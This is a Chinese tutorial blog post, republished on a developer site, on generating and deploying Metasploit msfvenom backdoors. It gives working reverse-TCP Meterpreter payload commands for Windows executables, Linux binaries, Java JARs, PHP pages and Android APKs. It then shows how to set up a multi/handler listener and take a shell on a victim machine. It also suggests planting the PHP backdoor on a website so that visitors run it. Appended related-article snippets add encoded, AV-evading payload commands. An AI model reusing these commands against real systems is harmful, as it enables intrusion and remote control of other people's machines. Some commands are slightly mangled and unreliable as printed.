MSF-Shellcode生成和使用

最新推荐文章于 2024-05-24 09:36:37 发布
最新推荐文章于 2024-05-24 09:36:37 发布
阅读量4.6k 收藏 7
点赞数
文章标签: 操作系统 php shell
原文链接:https://yq.aliyun.com/articles/486584
版权

1      使用环境

Kali 2.0

msfvenom

2      Msfvenom参数说明

msfvenom –h    查看帮助

说明:

Options:

     -p, --payload     <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定

     -l, --list       [module_type]   列出指定模块的所有可用资源模块类型包括: payloads, encoders, nops, all

     -n, --nopsled     <length>        payload预先指定一个NOP滑动长度

     -f, --format      <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

     -e, --encoder    [encoder]       指定需要使用的encoder(编码器)

     -a, --arch        <architecture>  指定payload的目标架构

         --platform    <platform>      指定payload的目标平台

     -s, --space       <length>        设定有效攻击荷载的最大长度

     -b, --bad-chars   <list>          设定规避字符集,比如: &#039;\x00\xff&#039;

     -i, --iterations <count>          指定payload的编码次数

     -c, --add-code    <path>          指定一个附加的win32 shellcode文件

     -x, --template    <path>          指定一个自定义的可执行文件作为模板

     -k, --keep                        保护模板程序的动作,注入的payload作为一个新的进程运行

         --payload-options            列举payload的标准选项

     -o, --out   <path>               保存payload

     -v, --var-name <name>             指定一个自定义的变量,以确定输出格式

         --shellest                   最小化生成payload

     -h, --help                        查看帮助选项

         --help-formats               查看msf支持的输出格式列表

 

2.1  命常用帮助命令

msfvenom --help-formats     查看有哪些格式输出

wKioL1hI3gjjOgNAAAKV6ft_ZBg812.png

 

msfvenom -l encoders       查看有哪些编码方式

3      Metasploit生成多种后门

Metasploit可以生成各种格式的后门,有phpexewindows下后门)、linux环境下后门,java后门、androiw后门等等。

可以生成aspaspxphpjspwarexe等多种类型

 

现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayloadmsfencode

 

 

3.1  生成window下后门程序

使用以下模块生成windows系统下后门程序。

windows/meterpreter/reverse_tcp

 

生成木马程序时如果可以指定也可以不指定--arch x86 --platform windows,不指定则会报错提示,不用理会,-p后写指定的payload-f后指定文件格式。

msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.1.115 LPORT=1234 -f exe > /aaa.exe

wKiom1hI3gjCzLlRAAEhv5HcAtg646.png

或者指定参数如下:

使用生成木马命令:

msfvenom -p windows/meterpreter/reverse_tcp--arch x86 --platform windows LHOST=192.168.1.115 LPORT=1234 -f exe >/aaa.exe

wKiom1hI3grgcyihAAGOFKMRwpw668.png

 

被中木马的机器IP地址是192.168.1.123

把在kali的根目录生产的木马程序aaa.exe文件拷贝到被攻击的机器上面去192.168.1.123上。

wKioL1hI3grxmHt_AAAwG5Oy2vg956.png

 

======================================================

设置监听:

使用监听模块:use exploit/multi/handler

wKiom1hI3omS5xzOAAM1eEthijI757.png


使用payload

wKioL1hI3orBrXS8AAC0_eD-OpQ566.png

 

wKioL1hI3vSiuE59AAaTqxI1GbM981.png

wKioL1hI3vXSBlhrAADfgOhiA8c563.png

wKiom1hI3vmR-ASJAAWCwoV2iA4762.png

执行监听

wKioL1hI3vqiYBb_AAEdIp1abUM618.png

 

=================================================

 

在被攻击的机器上面双机运行aaa.exe木马,此时在kali上面观看结果如下:

说明192.168.1.123已经被中木马了,可以控制此机器了。

wKiom1hI312AsSEiAALBjjKRbWg696.png

 

通过输入shell来进入控制台控制机器。

wKioL1hI316C0BdaAAF7T_kB1T8718.png

 

查看机器的ip地址是否是192.168.1.123

wKiom1hI32Dg0ZWWAAMjAOpZyzo807.png

3.2  生成linux下后门程序

使用以下模块生成linux后门程序,操作方法跟windows后门使用一样。

linux/x86/shell_reverse_tcp

 

windows系统唯一的区别是在linux下生成的木马需要给这个程序可执行的权限,通过使用以下命令chmod

Chmod +x 程序名

 

linux下执行木马程序命令:

./程序名

3.3  生成Java后门程序

Java程序在windows下和在linux下都可以生效执行的

 

使用以下模块生成后门程序:

java/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p java/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /jar.jar

wKioL1hI36GC_UTJAACer3BdfFw366.png


3.4  生成PHP后门程序

使用模块:

php/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /php.php

wKiom1hI36LitgJEAAIZIEum3Ag514.png

 

把生成的木马php文件放到网站上面,当别人访问的时候就会执行。

3.5  生成Android后门程序

使用模块:

android/meterpreter/reverse_tcp

 

生成木马命令:

msfvenom -p android/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /android.apk

wKioL1hI382wVcoCAAJWs0jEjm4508.png

 



本文转自 老鹰a  51CTO博客,原文链接:http://blog.51cto.com/laoyinga/1880673

weixin_34301307
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用MSF生成shellcode
weixin_34092455的博客
04-02 1033
使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
使用MSF打造各种ShellCode
weixin_30824599的博客
03-20 2168
MSF 生成各种后门 Windows: 生成Windows后门. msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe Linux...
木马与免杀(2), msfvenom 工具, shellcode代码, shellcode加载器
探测???
12-07 316
Shellcode是一段用于利用软件漏洞而执行的代码,通常以16进制机器码形式编写,因为它经常让攻击者获得shell的名称[1]。Shellcode的主要目的是让攻击者的恶意代码在受害者的计算机上执行,从而实现对系统的控制或数据的修改、窃取或上传等目的。Shellcode的内容通常是一段可以在受害者的计算机上执行的机器代码,用于实现攻击者的目标。这段代码可以是出于恶作剧目的弹出一个消息框,也可以出于攻击目的的删改重要文件、窃取数据、上传木马病毒并运行,甚至是出于破坏目的格式化硬盘等。
探索Windows平台下的Shellcode生成新境界 —— ShellCodeFrame
最新发布
gitblog_00007的博客
05-24 329
探索Windows平台下的Shellcode生成新境界 —— ShellCodeFrame 项目地址:https://gitcode.com/TonyChen56/ShellCodeFrame 在信息安全领域,Shellcode扮演着至关重要的角色,它是攻击者利用漏洞实施控制目标系统的关键代码。然而,传统的Shellcode编写需要深入的汇编知识,让许多开发者望而却步。现在,我们有幸发现了一款基于...
MSF 生成shell命令
baidu_126894的博客
10-20 1705
MSF 生成在 Linux 下反弹的 Meterpreter Shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell MSF 生成反弹 Shell (C Shellcode)...
4.1 MSF 制作shellcode,且运行
qq_55202378的博客
08-25 3364
msf shellcode
msf生成linux shellcode,MSF-Shellcode生成使用
weixin_33344952的博客
05-13 563
1使用環境Kali 2.0msfvenom2Msfvenom參數說明msfvenom �Ch 查看幫助說明:Options:-p, --payload 指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: ...
Veil-Ordnance:Veil-Ordnance是一种旨在快速生成MSF Stager Shellcode的工具
05-09
Veil-Ordnance旨在快速生成可用于漏洞利用或有效载荷的shellcode。 在@ christruncer,@ themightyshiv和@ harmj0y之间进行了多次讨论之后,我们得到了灵感。在这些讨论中,我们确定了需要一种生成shellcode的工具,...
gld:进入Shellcode LoaDer
05-24
我编写了一个包含更多规避技术的私有框架,将来可能会公开用法首先通过CS / MSF生成shellcode,然后使用gld编译包装的二进制文件: ./gld shellcode.bin [x64/x86]科技类装载机Shellcode通过AES-GCM加密,它将被...
shellcode加载器
10-02
Metasploit Framework则是一个开源的安全工具集,广泛用于漏洞利用和安全研究,其中包括生成和管理shellcode的功能。 综上所述,这个shellcode加载器的组合可能是一个用于渗透测试或研究目的的工具,使用者可以通过...
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
这里说明一下哈,这里是可以自定义shellcode进行注入的,并不是必须使用msf生成的shellcode进行注入 这里将自己扣出来的shellcode放在第一个输入框就行了,十进制的机器码之间以半角符逗号分隔开 生成的shellcode给...
Python-AV-Evasion:执行shellcode并使用python逃避AV检测
05-04
generate.py确实从给定的shellcode(从文件读取或由msfpayload / msfvenom插入)中生成python脚本(与以前的脚本类似),还可以选择添加Hyperion / Veil / 例如AV逃避)。 生成的脚本可以很好地与PyInstaller或类似...
msfvenom生成shellcode
nethm的专栏
09-20 1395
Framework Payloads (437 total) ============================== Name Description ---- -----------
【MSFconsole进阶】Msfvenom后门生成模块:使用方法、shell生成、各种格式生成
05-24 1828
【渗透工具】MSFconsole进阶:Msfvenom(后门生成模块)
msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解
代码审计
04-22 2237
抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload 抽离 专职生成对应的payload 异或 编码 免杀 msfvenom -l platforms 支持平台 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 896
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
msfvenom生成shell
向阳-Y.的博客
03-06 389
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connec
msf生成后门拿shell
weixin_30879833的博客
05-24 397
0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧 kali 172.18.5.118 靶机 172.18.5.240 先尝试能不能ping通 好的可以 那我们进行下一步 0X01爱之初体验 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpret...
metasploit产生shellcode
天元喜羊羊的博客
05-01 5683
root@bt:~# msfpayload windows/shell/bind_tcp LPORT=443 C /* * windows/shell/bind_tcp - 298 bytes (stage 1) * http://www.metasploit.com * VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=process, * Init
msf生成shellcode
06-28
### 回答1: MSF生成shellcode是一种常见的渗透测试技术,可以用于获取目标系统的控制权。使用MSF生成shellcode需要掌握一定的技术知识和经验,包括了解目标系统的漏洞、了解不同类型的shellcode以及使用MSF生成工具等。通过合理使用MSF生成shellcode,可以有效提高渗透测试的效率和成功率。 ### 回答2: MSF(Metasploit Framework)是一个广泛使用的渗透测试工具,常用于开发和测试网络安全漏洞。它的一个特色是可以自动生成各种Payload,包括各种平台的Shellcode。 Shellcode是一种十六进制编码的机器语言代码,它通常被黑客和渗透测试人员用于攻击目标计算机系统。通过使用MSF Framework,我们可以生成各种类型的Shellcode,这些Shellcode可以按照我们自己的需要进行定制。 在MSF Framework中,我们可以使用msfvenom工具生成Shellcode,该工具是一个十分强大的Payload 生成器,使用起来非常简单。首先,我们要指定Payload的类型,比如说是Windows还是Linux,以及处理器架构和操作系统版本。 生成Windows平台的Shellcode,我们可以使用下面这条命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f hex -o shellcode.txt 其中,“-p”指定Payload,这里我们使用的是windows/meterpreter/reverse_tcp,它可以反向连接我们指定的IP地址和端口。LHOST是我们的IP地址,LPORT是监听的端口。然后我们指定输出格式是hex,将其输出到shellcode.txt文件中。 生成Linux平台的Shellcode也很简单,我们可以使用下面这条命令: msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f hex -o shellcode.txt 这里我们使用的是linux/x86/shell/reverse_tcp Payload,它也可以反向连接指定的IP地址和端口。 总的来说,生成Shellcode是非常重要的黑客工作,使用MSF Framework的msfvenom工具可以帮我们快速生成各种类型的Shellcode,而且十分方便实用。但是需要注意的是,使用Shellcode进行攻击可能会违法,所以使用前要自觉遵守相关法律规定。 ### 回答3: MSF是Metasploit框架的简称,它是一种广泛使用的网络攻击工具。MSF有许多功能,其中一个基本功能就是生成shellcode。 Shellcode是位于程序中的二进制代码,其目的是执行特定的操作,比如弹出一个命令行窗口来执行攻击者命令等等。在网络攻击中,shellcode往往是黑客的“最后一击”,用来穿过目标系统的防御措施,从而实现控制盗窃信息或实施其他恶意行为。 MSF生成shellcode的步骤如下: 1. 打开MSF控制台,使用"msfvenom"命令来生成shellcode。我们可以使用如下命令来进行生成: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP address> LPORT=<attacker port number> -f <output file format> -o <output file location> 其中,“-p"参数代表payload(负载,即要注入目标系统的代码),windows/meterpreter/reverse_tcp是要注入的代码类型;"LHOST"参数代表攻击者的IP地址,"LPORT"参数代表攻击者的端口号;"-f"参数代表输出文件的格式;"-o"参数代表输出文件的位置。 2. 运行该命令后,MSF会生成自定义的shellcode,其格式为二进制代码。我们可以将其保存在本地,以备后续使用。 3. 将shellcode注入到目标系统中。可以使用一些漏洞利用工具,如MSF框架,或在攻击者手动操作目标系统时,利用目标服务器上已知漏洞的服务向该服务器注入shellcode。一旦该shellcode开始运行,攻击者就可以进入目标服务器并获取所需的信息。 需要注意的是,生成shellcode需要有一定的网络安全知识以及操作系统相关知识。同时,使用MSF框架及其相关工具进行攻击是非法行为,一定要遵守法律规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值